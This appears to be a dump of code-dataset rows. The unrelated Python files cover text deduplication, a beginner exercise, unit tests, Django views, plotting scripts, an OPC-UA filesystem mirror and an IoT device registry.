        self.data = LSHBasedFixSizeHash()
        self.nlp_service = NLPService.instance()
    def add(self, data, min_score=0.7):
        """Register *data* and report whether it is distinct.

        Returns False when an already-indexed text exceeds *min_score*
        similarity, True otherwise.
        NOTE(review): the sketch is inserted into the index *before* the
        similarity decision, so duplicates are indexed too -- confirm that is
        intended rather than only indexing distinct texts.
        """
        # Sentence-split, then segment each sentence into words.
        docs = self.nlp_service.sentencesize(data)
        words = [word for doc in docs for word in self.nlp_service.seg_words(doc)]
        m = MinHash()
        for word in words:
            m.update(word.encode())
        # Highest similarity against everything indexed so far.
        m_score = self.data.get_max_similar(m)
        self.data.add(m)
        if m_score > min_score:
            return False
        else:
            return True
|
999,422 | 74074c63fdc7cd361802ac781bef241980a85946 | # -*- coding: utf-8 -*-
# Read `quant` integers, accumulate even/odd sums and counts, and print the
# population standard deviation of the collected values.
# BUG FIX: the original declared sompar/somimpar/qpar/qimpar but never updated
# them, and printed an undefined name `desvpad` (guaranteed NameError).
quant = int(input('Quantos elementos você quer? '))
lista = []
sompar = 0    # sum of the even elements
somimpar = 0  # sum of the odd elements
qpar = 0      # count of even elements
qimpar = 0    # count of odd elements
for _ in range(quant):
    elemento = int(input('Digite o elemento: '))
    lista.append(elemento)
    if elemento % 2 == 0:
        sompar += elemento
        qpar += 1
    else:
        somimpar += elemento
        qimpar += 1
# Population standard deviation (0.0 for an empty input).
if lista:
    media = sum(lista) / len(lista)
    desvpad = (sum((x - media) ** 2 for x in lista) / len(lista)) ** 0.5
else:
    desvpad = 0.0
print(desvpad)
999,423 | 7ef842725980207f1b21c62a9d1b7355138c6046 | from ast import walk, For
import os
import sys
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]), "..", "..")))
from testrunner import CodersLabTestSuite, CodersLabException, p, dedent
tc = CodersLabTestSuite("Kolejne potęgi")
@tc.test("Skrypt wypisuje zdania na ekranie", aborts=True)
def test_printing(invoke, stdout, **kwargs):
invoke()
tc.assert_print_called(stdout)
for num in range(11):
phrase = "2 do potęgi {} to {}".format(num, 2 ** num)
if phrase not in "".join(stdout).lower():
raise CodersLabException("Nie znaleziono frazy {}".format(p.b.get(phrase)))
@tc.test("Pętla for była użyta do wykonania zadania", aborts=True)
def test_for_used(ast, **kwargs):
for node in walk(ast):
if isinstance(node, For):
break
else:
raise CodersLabException(
"W zadaniu nie znaleziono pętli {}".format(p.b.get("for"))
)
tc.run()
|
999,424 | 6864de2e5057aeb328378ec94d3973146614f790 | """
Import CSV file module
"""
def parser():
    """Return the subcommand metadata for the Visual Genome importer."""
    return dict(help='Import Visual Genome into KGTK format')
def add_arguments(parser):
    """
    Parse arguments

    Registers the Visual Genome importer's command-line options.

    Args:
        parser (argparse.ArgumentParser)
    """
    parser.add_argument("-sgf", "--scene-graphs-file", action="store", type=str, dest="scene_graphs_file", required=True, help='scene graphs json file')
    parser.add_argument("-rgf", "--region-graphs-file", action="store", type=str, dest="region_graphs_file", required=True, help='region graphs json file')
    parser.add_argument("-asf", "--attribute-synsets-file", action="store", type=str, dest="attr_synsets_file", required=True, help='attribute synsets json file')
    # NOTE(review): "--header" storing into dest="delimiter" looks like a
    # copy/paste slip -- confirm which destination name callers actually read.
    parser.add_argument("-e", "--header", action="store", type=str, dest="delimiter")
    # NOTE(review): these two dests are UPPER_CASE unlike the snake_case ones
    # above -- verify consumers expect args.NODE_COLS / args.EDGE_COLS.
    parser.add_argument( "-nc", "--node-columns", action="store", nargs="*", dest="NODE_COLS")
    parser.add_argument("-ec", "--edge-columns", action="store", nargs="*", dest="EDGE_COLS")
def run(filename, delimiter, header=None):
    """Report the import parameters for the (stub) importer.

    Args:
        filename: path of the file being imported (currently unused in the
            status line, which prints the literal "(unknown)").
        delimiter: field delimiter used by the importer.
        header: optional header description. Added with a default of None so
            existing two-argument callers keep working.

    BUG FIX: the original body referenced an undefined name ``header`` and
    always raised NameError; the unused local ``import socket`` was removed.
    """
    print(f'Now importing (unknown) with a delimiter {delimiter} and header {header}')
|
999,425 | f277f92f010376d55f56bfc2a49dbccea25e22b8 | import os
from opcua import ua
from .base import BasicSystem
class FileSystem(BasicSystem):
    """Mirror a local directory tree into the OPC-UA address space.

    Every file/directory under the mount directory becomes a UA object node
    whose NodeId string is the path relative to the current working directory.
    """
    # UA type ids for directory-like and file-like objects.
    ua_dir_type = 13353
    ua_file_type = 11575

    def __init__(self, data_handler, inputs=None, outputs=None, **kwargs):
        """Create the mount root node and populate it from disk.

        Keyword option ``options={'dir': path}`` selects the mount directory;
        it defaults to ./mnt and is created if missing.
        """
        BasicSystem.__init__(self, data_handler, inputs, outputs)
        options = kwargs.get('options', {})
        self.mnt_dir = os.path.abspath(options.get('dir', './mnt'))
        base_node = self.data_handler.get_node('Filesystem')
        if not os.path.isdir(self.mnt_dir):
            os.mkdir(self.mnt_dir)
        self.mnt_node = base_node.add_object(ua.NodeId('/mnt', 26), 'mnt', objecttype=self.ua_dir_type)
        self.recursive_file_list(self.mnt_dir, self.mnt_node)

    def recursive_file_list(self, parent_path, parent_node):
        """Recursively add UA object nodes for everything under parent_path."""
        for ent in os.listdir(parent_path):
            # BUG FIX: entries must be joined against parent_path, not the
            # mount root (self.mnt_dir) -- the old code produced wrong paths
            # for every entry inside a nested directory. Debug print removed.
            ent_path = os.path.join(parent_path, ent)
            rel_path = '/{}'.format(os.path.relpath(ent_path, os.path.abspath('.')))
            if os.path.isfile(ent_path):
                parent_node.add_object(ua.NodeId(rel_path, 26), ent, objecttype=self.ua_file_type)
            elif os.path.isdir(ent_path):
                ent_node = parent_node.add_object(ua.NodeId(rel_path, 26), ent, objecttype=self.ua_dir_type)
                self.recursive_file_list(ent_path, ent_node)

    def process(self):
        # No cyclic work; the tree is built once in __init__.
        pass
|
999,426 | 0fa2d55a64be00bcd4b533446fed4ddec3d045a3 | import threading
import base, gen
import gtk, gobject, cairo
import time
import config
gtk.gdk.threads_init()
class Line:
    """One horizontal timeline segment: height, start, length and RGB colour."""

    def __init__(self, h, begin, tam, cor):
        self.altura = h       # vertical position (0..1)
        self.comeco = begin   # horizontal start (0..1)
        self.tamanho = tam    # horizontal length
        # Split the colour triple into its channels (indexing keeps the
        # original's tolerance of sequences longer than three).
        self.r, self.g, self.b = cor[0], cor[1], cor[2]
# Colour palette for timeline segments; Plot.draw indexes it with the
# int(ordem) value of the current action's process.
cores = [(0.8, 0.0, 0.8),
         (0.0, 0.0, 0.8),
         (0.0, 0.8, 0.0),
         (0.8, 0.0, 0.0),
         (0.8, 0.8, 0.0),
         (0.0, 0.8, 0.8),
         (0.4, 0.4, 0.4)]
class Plot(base.Tela):
    """Animated timeline: draws one coloured segment per scheduled action.

    NOTE(review): the commented-out Python 2 ``print`` statements and the
    gtk/gobject bindings suggest this module targets Python 2.
    """
    def __init__(self):
        base.Tela.__init__(self)
        # Build the initial schedule; the meaning of gen.q / 0.2 / 0.5 is
        # defined by gen.f -- confirm against the gen module.
        self.set_r(gen.q, 0.2, 0.5)
    def draw_seg(self, cr, line, time, flag):
        # Draw one horizontal segment; `time` here is a *label string*, not a
        # number (the parameter shadows the `time` module inside this method).
        cr.set_line_width(0.003)
        cr.set_source_rgb(line.r, line.g, line.b)
        cr.move_to(line.comeco, line.altura)
        cr.line_to(line.comeco + line.tamanho, line.altura)
        cr.stroke()
        # Only finished segments (falsy flag) get their elapsed-time label.
        if not flag:
            cr.set_source_rgb(line.r, line.g, line.b)
            cr.move_to(line.comeco + line.tamanho, line.altura)
            cr.select_font_face("Helvetica")
            cr.set_font_size(0.02)
            cr.rel_move_to(0, 0.03)
            cr.show_text(time)
    def set_r(self, l, o, q):
        """Reset the schedule and the animation's timing origin."""
        self.r = gen.f(l, o, q)
        self.ta = time.time()   # wall-clock start of the animation
        self.tacc = self.ta     # time accumulated up to the current action
        self.lines = []         # finished segments as (elapsed, Line) pairs
    def draw(self, cr, width, height):
        """Repaint: white background, finished segments, then the live one."""
        #print "Hmmm, ", self.data.r()
        cr.set_source_rgb(1, 1, 1)
        cr.rectangle(0, 0, width, height)
        cr.fill()
        cr.translate(0, 0)
        # Normalise to a unit coordinate system (0..1 in both axes).
        cr.scale(width / 1.0, height / 1.0)
        cr.push_group()
        cor = (0.0, 0.0, 0.8)
        if self.r.acoes:
            # Head of the action queue: (duration, process-name) pair.
            p = self.r.acoes[0]
            tempo, nome = p
            #if len(self.r.acoes) == 1:
            #    print tempo, '!!'
            #    tempo -= 1.0
            ordem = self.r.ordem[nome]
            global cores
            cor = cores[int(ordem)]
            # Vertical lane for this process and normalised start/length.
            q = (ordem + 1) / (self.r.num + 1)
            # NOTE(review): `p` is reused here for the current wall-clock time.
            p = time.time()
            t0 = (self.tacc - self.ta) / self.r.total
            dt = (p - self.tacc) / self.r.total
            #print nome, dt
            line = Line(q, t0, dt, cor)
            if time.time() < tempo + self.tacc:
                # Action still running: draw its growing segment, no label.
                #print self.t(), tempo, self.tacc
                self.draw_seg(cr, line, '0', True)
            else:
                # Action finished: retire it and archive the segment.
                self.r.acoes.pop(0)
                #print "%s, %s, %s, %s" % t0, dt,
                self.lines.append((p - self.ta, line))
                self.tacc += tempo
        # Redraw every archived segment with its elapsed-time label.
        for line in self.lines:
            self.draw_seg(cr, line[1], "%.2f" % line[0],
                      self.r.acoes)
        cr.pop_group_to_source()
        cr.paint()
plot = Plot()

def timeout():
    """Periodic GLib callback: request a redraw; returning True keeps the timer alive."""
    plot.queue_draw()
    return True

# Repaint roughly every 16 ms (~60 FPS).
gobject.timeout_add(16, timeout)
# Hand control to the application main loop; plot.set_r is presumably the
# reset/configure hook base.main exposes to the UI -- confirm against base.
base.main(plot, plot.set_r)
|
999,427 | efa3b0b338d4c1469cf18875d307f0d4c83f777e | import sys
import unittest
import testing_utilities as t_u
sys.path.insert(0, '..')
class TestIOInstructions(unittest.TestCase):
    """Exercises the print instructions through the testing_utilities runner."""

    def _check(self, before, after, instruction):
        # Shared driver: run one instruction and assert the runner reports success.
        self.assertTrue(t_u.run_test(before, after, instruction))

    def test_print_A(self):
        self._check({'_integer': [7]}, {'_stdout': '7'}, '_print_integer')

    def test_print_B(self):
        self._check({'_float': [7.1]}, {'_stdout': '7.1'}, '_print_float')

    def test_print_newline_A(self):
        self._check({'_stdout': 'A'}, {'_stdout': 'A\n'}, '_print_newline')

    def test_print_newline_B(self):
        self._check({}, {'_stdout': '\n'}, '_print_newline')
|
999,428 | 699e1503d1eacdbcb39a1e8f6d9d7bff29612c58 | from django.shortcuts import render
from .models import ContactData,FeedbackData
from .forms import FeedbackForm,ContactForm
from django.http.response import HttpResponse
def home_view(request):
    """Render the static home page."""
    return render(request,'home.html')
def contact_view(request):
    """Show the contact form; persist valid POST submissions as ContactData.

    GET: render an empty form.  POST: validate, save a ContactData row and
    re-render with a fresh form; invalid data returns a plain error response
    (matching the original behavior).
    """
    if request.method == 'POST':
        # BUG FIX: bind the form to the submitted data; the original passed
        # request.method (the string 'POST') instead of request.POST.
        form = ContactForm(request.POST)
        # BUG FIX: is_valid is a method -- the original referenced it without
        # calling it, which is always truthy and skipped validation entirely
        # (and left cleaned_data undefined).
        if form.is_valid():
            data = ContactData(
                name=form.cleaned_data.get('name'),
                email=form.cleaned_data.get('email'),
                mobile=form.cleaned_data.get('mobile'),
                courses=form.cleaned_data.get('course'),
                location=form.cleaned_data.get('location'),
                shift=form.cleaned_data.get('shift'),
            )
            data.save()
            form = ContactForm()
            return render(request, 'contact.html', {'form': form})
        else:
            return HttpResponse('form is not valid')
    else:
        form = ContactForm()
        return render(request, 'contact.html', {'form': form})
def services_view(request):
    """Render the static services page."""
    return render(request,'services.html')
import datetime as dt

# NOTE(review): evaluated once at import time, so any row stamped with date1
# carries the server start time, not the time of the request -- compute the
# timestamp inside the view if per-submission times are intended.
date1 = dt.datetime.now()
def feedback_view(request):
    """Show the feedback page; on valid POST store a FeedbackData row.

    Always renders feedback.html with a form and the full list of feedback.
    """
    if request.method == 'POST':
        # BUG FIX: bind the form to the POSTed data; the original passed
        # request.method (the string 'POST'), so validation could never work.
        form = FeedbackForm(request.POST)
        if form.is_valid():
            data = FeedbackData(
                name=request.POST.get('name'),
                rating=request.POST.get('rating'),
                feedback=request.POST.get('feedback'),
                # BUG FIX: stamp the actual submission time; the module-level
                # date1 was computed once at import, so every row carried the
                # server start time.
                date=dt.datetime.now(),
            )
            data.save()
            feedbacks = FeedbackData.objects.all()
            form = FeedbackForm()
            return render(request, 'feedback.html', {'form': form, 'feedbacks': feedbacks})
        # Invalid POST: re-render with the bound form so field errors show
        # (the original fell off the end and returned None here).
        feedbacks = FeedbackData.objects.all()
        return render(request, 'feedback.html', {'form': form, 'feedbacks': feedbacks})
    else:
        form = FeedbackForm()
        feedbacks = FeedbackData.objects.all()
        return render(request, 'feedback.html', {'form': form, 'feedbacks': feedbacks})
def gallery_view(request):
    """Render the static gallery page."""
    return render(request,'gallery.html')
|
999,429 | 43a0dacd7c4477131a331bc7a7cba89a4047d826 |
import numpy as np
import matplotlib.pyplot as plt
import math
from parse_log_files import parseAndClusteredLogFiles
def main():
    """Parse the clustered log files under `path` and plot every dataset found."""
    path = "../images/run_2019_10_08"
    logs_datasets = parseAndClusteredLogFiles(path)
    for dataset in logs_datasets:
        # Each dataset gets its own output directory next to the logs.
        output_path = path + "/" + dataset
        try:
            plotDataset(logs_datasets[dataset], dataset, output_path)
        except Exception as exc:
            # Keep going when one dataset fails, but report why instead of
            # swallowing the error with a bare except as the original did.
            print("not able to plot dataset " + dataset + ": " + str(exc))
def plotDataset(dataset, dataset_name, output_path):
    """Generate every comparison plot for one dataset.

    dataset: dict mapping a configuration name (one of `names` below) to its
    parsed log data; dataset_name: plot title; output_path: file prefix.
    """
    names = ['ARAP',                                    # 0
             'ARAP ReduceRigidity',                     # 1
             'ARAP Adaptive Edge',                      # 2
             'ARAP Adaptive Vertex',                    # 3
             'ARAP ReduceSmooth',                       # 4
             'ARAP Refine Edge',                        # 5
             'ARAP Refine Vertex',                      # 6
             'Embedded Deformation',                    # 7
             'ARAP Adaptive Edge ReduceSmooth',         # 8
             'ARAP Adaptive Vertex ReduceSmooth',       # 9
             'ARAP Adaptive Edge ReduceRigidity',       # 10
             'ARAP Adaptive Vertex ReduceRigidity',     # 11
             'ARAP ReduceRigidity ReduceSmooth',        # 12
             'ARAP Refine Edge ReduceSmooth',           # 13
             'ARAP Refine Vertex ReduceSmooth',         # 14
             ]

    def subset(keys):
        # Select only the listed configurations, preserving dataset's order.
        return {k: dataset[k] for k in dataset if k in keys}

    # BUG FIX: the original used substring tests (`k in names[0]`) to select
    # single configurations; for the exact names above that happened to act
    # like equality, which the explicit lists below encode unambiguously.
    dataset_no_ed = subset(names[0:7])
    dataset_rigidity = subset(names[0:4])
    dataset_refinment = subset(names[4:7] + [names[0]])
    dataset_combinations_rigidity_reduction = subset(names[10:12] + names[0:2])
    dataset_combinations_smoothness_reduction_adaptive = subset(names[8:10] + [names[0], names[4]])
    dataset_combinations_smoothness_reduction_refinement = subset(names[13:] + [names[0], names[4]])
    dataset_combinations_smoothness_rigidity_reduction = subset(names[12:13] + names[0:2] + [names[4]])
    # Adaptive rigidity combined with rigidity/smoothness reduction.
    dataset_combinations_adaptive_rigidity = subset(names[8:12] + names[0:2])
    # Refinement combined with smoothness/rigidity reduction.
    dataset_combinations_refinement_and_smoothness_rigidity = subset(names[12:] + names[0:2])
    # Every combination variant at once.
    dataset_all_combinations = subset(names[8:] + names[0:2])

    for k in dataset:
        if dataset[k]:
            print("log file " + dataset[k][0]['log file'])

    plotDatasetMean(dataset_no_ed, dataset_name, output_path)
    plotDatasetMedian(dataset_no_ed, dataset_name, output_path)
    plotDatasetMeanCombinations(dataset_combinations_smoothness_reduction_adaptive, dataset_name, output_path + "/smoothness_adaptive_")
    plotDatasetMeanCombinations(dataset_combinations_smoothness_reduction_refinement, dataset_name,
                                output_path + "/smoothness_refinement_")
    plotDatasetMeanCombinations(dataset_combinations_rigidity_reduction, dataset_name, output_path + "/rigidity_")
    plotDatasetMeanCombinations(dataset_combinations_smoothness_rigidity_reduction, dataset_name, output_path + "/rigidity_smoothness_")
    plotDatasetMeanCombinations(dataset_combinations_refinement_and_smoothness_rigidity, dataset_name,
                                output_path + "/refinement_and_rr_sr_")
    plotDatasetMeanCombinations(dataset_combinations_adaptive_rigidity, dataset_name,
                                output_path + "/adaptive_rigidity_")
    plotAndSaveImage(dataset_combinations_refinement_and_smoothness_rigidity, 'error mean', dataset_name, 'Mean Chamfer Distance',
                     output_path + "/mean_refinement_and_rr_sr_")
    plotAndSaveImage(dataset_combinations_adaptive_rigidity, 'error mean', dataset_name, 'Mean Chamfer Distance',
                     output_path + "/mean_adaptive_rigidity_")
    plotAndSaveImage(dataset_all_combinations, 'error mean', dataset_name, 'Mean Chamfer Distance',
                     output_path + "/mean_all_combinations_")
def plotDatasetMean(logs, title, output_path):
    """Plot the per-frame mean Chamfer distance twice: once with the default
    legend position ('mean_') and once anchored lower right ('legend_mean_')."""
    plotAndSaveImage(logs, 'error mean', title, 'Mean Chamfer Distance', output_path + "/mean_")
    plotAndSaveImage(logs, 'error mean', title, 'Mean Chamfer Distance', output_path + "/legend_mean_", False, 'lower right')
def plotDatasetMeanScaled(logs, title, output_path):
    """Like plotDatasetMean but using the pre-scaled 'scaled error mean' key."""
    plotAndSaveImage(logs, 'scaled error mean', title, 'Mean Chamfer Distance in 10−4', output_path + "/mean_")
    plotAndSaveImage(logs, 'scaled error mean', title, 'Mean Chamfer Distance', output_path + "/legend_mean_", False, 'lower right')
def plotDatasetMeanCombinations(logs, title, output_path):
    """Combination-layout variant of plotDatasetMean (squarer figure/fonts)."""
    plotAndSaveImageCombinations(logs, 'error mean', title, 'Mean Chamfer Distance', output_path + "mean_")
    plotAndSaveImageCombinations(logs, 'error mean', title, 'Mean Chamfer Distance', output_path + "legend_mean_", False, 'lower right')
def plotDatasetMeanPerNode(logs, title, output_path):
    """Plot the per-frame 'mean per node' Chamfer distance."""
    plotAndSaveImage(logs, 'mean per node', title, 'Chamfer Distance Mean per Node', output_path + "/mean_per_node_")
def plotDatasetMedian(logs, title, output_path):
    """Plot the per-frame median (and median per node) on a log y scale."""
    plotAndSaveImage(logs, 'error median', title, 'chamfer distance median', output_path + "/median_", True)
    plotAndSaveImage(logs, 'median per node', title, 'chamfer distance median per node', output_path + "/median_per_node_", True)
def plotAndSaveImage(logs, key, title, ylabel, output_path, log_scale = False, legend_location = 'upper left'):
    """Plot `key` over frames for every entry of `logs` and save as a PDF.

    logs: dict of configuration name -> (header dict, list of per-frame dicts);
    key: which per-frame value to plot; the file is saved as
    `<output_path><title with underscores>.pdf`.
    """
    plt.rcParams.update({'font.size': 12})
    fig = plt.figure(figsize=plt.figaspect(0.60))
    plt.title(title, {'fontsize':18})
    ax1 = fig.add_subplot(1, 1, 1)
    ax1.set_xlabel('Frames', fontsize=14)
    ax1.set_ylabel(ylabel, fontsize=14)
    if log_scale:
        ax1.set_yscale('log')
    plot_colors = ['r', 'b', 'm', 'c', 'g', 'y', 'k',
                   (0.0, 1.0, 0.5, 1.), (1.0, 0.5, 0.0, 1.), (0.5, 1.0, 0.0, 1.), (0.0, 0.5, 1.0, 1.),
                   (0.25, 0.5, 0.25, 1.), (0.25, 0.5, 0.5, 1.), 'b', 'b', 'b', 'b', 'b']
    n = 0
    frames = []
    for k in logs:
        data = logs[k]
        if not data:
            # Keep the color index aligned with the configuration slot.
            n = n + 1
            continue
        log_dict = data[1]
        error_means = [(d[key]) for d in log_dict]
        frames = [int(d['frame']) for d in log_dict]
        ax1.plot(frames, error_means, color = plot_colors[n], label = data[0]['legend name'])
        n = n+1
    if title == 'head':
        # Fixed y range for the head dataset so its plots are comparable.
        ax1.set_ylim([0, 0.00016])
    # BUG FIX: `frames` is only meaningful if at least one entry was plotted;
    # the original referenced it unconditionally and crashed with NameError
    # when `logs` was empty or contained only empty entries.
    if frames:
        ax1.set_xlim([0, max(frames)])
        x_step_size = 10. if max(frames) < 75 else 20.
        plt.xticks(np.arange(min(frames)-1, max(frames) + 1, x_step_size))
    plt.legend(loc=legend_location, prop={'size': 12})
    plt.grid(b=None, which='major', axis='both')
    fig.tight_layout()
    output = output_path + title.replace(" ", "_") + '.pdf'
    try:
        plt.savefig(output)
        print('saved' + " " + output)
    except Exception as exc:
        # Narrowed from a bare except; include the reason in the report.
        print('Could not save to ' + output + ' (' + str(exc) + ')')
    plt.clf()
    plt.close()
def plotAndSaveImageCombinations(logs, key, title, ylabel, output_path, log_scale = False, legend_location = 'upper left'):
    """Like plotAndSaveImage but with the squarer layout/fonts used for the
    combination plots and per-dataset fixed y ranges.

    logs: dict of configuration name -> (header dict, list of per-frame dicts);
    key: which per-frame value to plot; the file is saved as
    `<output_path><title with underscores>.pdf`.
    """
    plt.rcParams.update({'font.size': 11})
    fig = plt.figure(figsize=plt.figaspect(0.9))
    plt.title(title, {'fontsize':18})
    ax1 = fig.add_subplot(1, 1, 1)
    ax1.set_xlabel('Frames', fontsize=12)
    ax1.set_ylabel(ylabel, fontsize=12)
    if log_scale:
        ax1.set_yscale('log')
    plot_colors = ['r', 'b', 'm', 'c', 'g', 'y', 'k',
                   (0.0, 1.0, 0.5, 1.), (1.0, 0.5, 0.0, 1.), (0.5, 1.0, 0.0, 1.), (0.0, 0.5, 1.0, 1.),
                   (0.25, 0.5, 0.25, 1.), (0.25, 0.5, 0.5, 1.), 'b', 'b', 'b', 'b', 'b']
    n = 0
    frames = []
    for k in logs:
        data = logs[k]
        if not data:
            # Keep the color index aligned with the configuration slot.
            n = n + 1
            continue
        log_dict = data[1]
        error_means = [(d[key]) for d in log_dict]
        frames = [int(d['frame']) for d in log_dict]
        ax1.plot(frames, error_means, color = plot_colors[n], label = data[0]['legend name'])
        n = n+1
    # Fixed y ranges per dataset so the combination plots are comparable.
    if title == 'paperbag':
        ax1.set_ylim([0, 0.0009])
    elif title == 'puppet':
        ax1.set_ylim([0, 0.0008])
    elif title == 'hand':
        ax1.set_ylim([0, 0.0004])
    elif title == 'head':
        ax1.set_ylim([0, 0.00016])
    # BUG FIX: `frames` is only bound if at least one entry was plotted; the
    # original crashed with NameError on empty input.
    if frames:
        ax1.set_xlim([0, max(frames)])
        x_step_size = 10. if max(frames) < 75 else 20.
        plt.xticks(np.arange(min(frames)-1, max(frames) + 1, x_step_size))
    plt.legend(loc=legend_location, prop={'size': 12})
    plt.grid(b=None, which='major', axis='both')
    fig.tight_layout()
    output = output_path + title.replace(" ", "_") + '.pdf'
    try:
        plt.savefig(output)
        print('saved' + " " + output)
    except Exception as exc:
        # Narrowed from a bare except; include the reason in the report.
        print('Could not save to ' + output + ' (' + str(exc) + ')')
    plt.clf()
    plt.close()
if __name__=='__main__':
main()
|
999,430 | e98471891ec1e6780a9c5cb3e15a802363110ad0 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Created on Nov 7, 2015
Don't blink...
@author: Juan_Insuasti
'''
from Model import Sensor
from Model import Actuator, Camera
import sys
import datetime
from Shared import Logger
from Broker import Broker
import json
class Device:
    """One registered hardware device.

    Mirrors the device's state (sensors, actuators, online flag) into the
    database and subscribes to broker topics for sensor/actuator registration
    messages and for connect/disconnect presence updates.
    """

    def __init__(self, database, storage, id, type, broker, enabled, basePath="", topicSensor="/regSensor", topicActuator="/regActuator", logs=True, logName="Device"):
        self.db = database
        self.storage = storage
        self.online = True      # assumed connected until the broker reports otherwise
        self.id = id
        self.type = type
        self.enabled = enabled
        self.sensors = {}       # sensor id -> Sensor.Sensor
        self.actuators = {}     # actuator id -> Actuator.Actuator / Camera.Camera
        # DB update period in seconds keyed by sensor type; presumably 'MST'
        # and 'LIG' are the only sensor types -- confirm against Sensor.
        self.updateTime = { 'MST': 60,
                            'LIG': 5 }
        self.path = basePath + "/devices/" + str(self.id)
        self.console = Logger.Logger(logName="Device("+self.path+")", enabled=logs, printConsole=True)
        self.topicSensor = self.path + topicSensor
        self.topicActuator = self.path + topicActuator
        self.console.log("Initialization...")
        # Subscribe to both registration topics plus the device's own
        # presence topic, then persist the initial state.
        self.broker = broker
        self.broker.subscribeTopicWithCallback(self.topicSensor, self.brokerCallback )
        self.broker.subscribeTopicWithCallback(self.topicActuator, self.brokerCallback )
        self.broker.subscribeTopicWithCallback(self.path, self.onlineCheck )
        self.saveDeviceToDB()

    def onlineCheck(self, topic, payload):
        """Presence callback: track 'connected'/'disconnected' payloads and
        persist the resulting online state (other payloads leave it unchanged)."""
        if payload == "connected":
            self.online = True
        if payload == "disconnected":
            self.online = False
        self.saveDeviceToDB()

    def brokerCallback(self, topic, payload):
        """Registration callback for new sensors and actuators.

        The payload is JSON-like but single-quoted, hence the quote swap
        before json.loads -- NOTE(review): this breaks if any value itself
        contains a quote character.
        """
        payload2 = payload.replace("'", '"')
        self.console.log("Broker callback")
        data = json.loads(payload2)
        self.console.log("Topic: %s", topic)
        self.console.log("ID: %s, Type: %s", (data['id'], data['type']))
        if (topic == self.topicActuator):
            if ( data['id'] not in self.actuators.keys()):
                # Cameras are a special kind of actuator carrying settings.
                if ( data['type'] == "CAM" ):
                    self.console.log("New Camera")
                    self.addCamera(data['id'], data['type'], True, data['settings'])
                    self.saveDeviceToDB()
                else:
                    self.console.log("New Actuator")
                    self.addActuator(data['id'], data['type'], True)
                    self.saveDeviceToDB()
            else:
                self.console.log("Actuator already exists")
        elif (topic == self.topicSensor):
            if ( data['id'] not in self.sensors.keys()):
                self.console.log("New Sensor")
                self.addSensor(data['id'], data['type'], True)
                self.saveDeviceToDB()
            else:
                self.console.log("Sensor already exists")

    def getDeviceData(self):
        """Return this device's database representation (UTC timestamp included)."""
        data = {
            "id": self.id,
            "type": self.type,
            "enabled": self.enabled,
            "timestamp": datetime.datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S"),
            "online": self.online
        }
        return data

    def saveDeviceToDB(self):
        """Persist this device and cascade the save to all sensors/actuators."""
        self.console.log("Saving device data to database")
        data = self.getDeviceData()
        self.db.updateData(self.path, data)
        for sensorId in self.sensors.keys():
            self.sensors[sensorId].saveDataToDB()
        for actuatorId in self.actuators.keys():
            self.actuators[actuatorId].saveDataToDB()

    def addSensor(self, sensorId, type, enabled):
        """Create and register a Sensor; its DB update rate comes from updateTime."""
        self.console.log("Adding sensor(%s) %s ", (sensorId, type))
        self.sensors[sensorId] = Sensor.Sensor(database=self.db, storage=self.storage, broker = self.broker, id=sensorId, type=type, enabled=enabled, filterSamples=30, devicePath= self.path, datasetLength = 24, skipSamples=30, dbUpdateTime=self.updateTime[type])

    def addActuator(self, actuatorId, type, enabled):
        """Create and register a plain Actuator."""
        self.console.log("Adding Actuator(%s) %s ",(actuatorId, type))
        self.actuators[actuatorId] = Actuator.Actuator(database=self.db, broker = self.broker, id=actuatorId, type=type, enabled=enabled, devicePath= self.path)

    def addCamera(self, cameraId, type, enabled, settings):
        """Create and register a Camera (kept in the actuators map)."""
        self.console.log("Adding Camera(%s) %s ",(cameraId, type))
        self.actuators[cameraId] = Camera.Camera(database=self.db, broker = self.broker, id=cameraId, type=type, enabled=enabled, devicePath= self.path, settings = settings)
if __name__ == '__main__':
pass
|
999,431 | fca43ed5584500fa3ae7b166f5d4aca67b0ad569 | import tensorflow as tf
import numpy as np
# Destination directory and checkpoint prefix for the test model.
weights3d_dir = '/home/vador/Documents/project/AI/drl-rpn-tf-video/pretrained-data/data3D/'
model3d = weights3d_dir + 'model_test'

# Two random 4x5x5 integer tensors; vt3 (their elementwise product) only puts
# an op in the graph -- it is never evaluated below.
vn1 = np.array(np.random.randint(0, 10, (4,5,5)))
vt1 = tf.Variable(vn1, name='v1')
vn2 = np.array(np.random.randint(0, 10, (4,5,5)))
vt2 = tf.Variable(vn2, name='v2')
vt3 = tf.multiply(vt1, vt2)

# TF1-style session: initialize the variables and write the checkpoint files.
init = tf.global_variables_initializer()
saver = tf.train.Saver()
with tf.Session() as sess:
    sess.run(init)
    saver.save(sess, model3d)
|
999,432 | 8b27829c755702793c6717ff4b4304730d5e1a3c | import uuid
import os
from datetime import datetime
from django.db import transaction
from api.management.data_script import OperationalDataScript
from api.models.ApprovedFuel import ApprovedFuel
from api.models.ApprovedFuelProvision import ApprovedFuelProvision
from api.models.CarbonIntensityDeterminationType import CarbonIntensityDeterminationType
from api.models.CarbonIntensityLimit import CarbonIntensityLimit
from api.models.CompliancePeriod import CompliancePeriod
from api.models.DefaultCarbonIntensity import DefaultCarbonIntensity
from api.models.DefaultCarbonIntensityCategory import DefaultCarbonIntensityCategory
from api.models.EnergyDensity import EnergyDensity
from api.models.EnergyDensityCategory import EnergyDensityCategory
from api.models.EnergyEffectivenessRatio import EnergyEffectivenessRatio
from api.models.EnergyEffectivenessRatioCategory import EnergyEffectivenessRatioCategory
from api.models.ExpectedUse import ExpectedUse
from api.models.FuelClass import FuelClass
from api.models.NotionalTransferType import NotionalTransferType
from api.models.Organization import Organization
from api.models.OrganizationActionsType import OrganizationActionsType
from api.models.OrganizationBalance import OrganizationBalance
from api.models.OrganizationStatus import OrganizationStatus
from api.models.OrganizationType import OrganizationType
from api.models.PetroleumCarbonIntensity import PetroleumCarbonIntensity
from api.models.PetroleumCarbonIntensityCategory import PetroleumCarbonIntensityCategory
from api.models.ProvisionOfTheAct import ProvisionOfTheAct
from api.models.Role import Role
from api.models.SigningAuthorityAssertion import SigningAuthorityAssertion
from api.models.TransactionType import TransactionType
from api.models.User import User
from api.models.UserRole import UserRole
class DockerEnvironment(OperationalDataScript):
    """Seed script that builds a development environment for docker-compose."""

    comment = 'Build development environment for docker compose'
    is_revertable = False
    # Usernames created by run(); also checked by check_run_preconditions().
    _usernames = ['fs1',
                  'fs2',
                  'fs3',
                  'analyst',
                  'director',
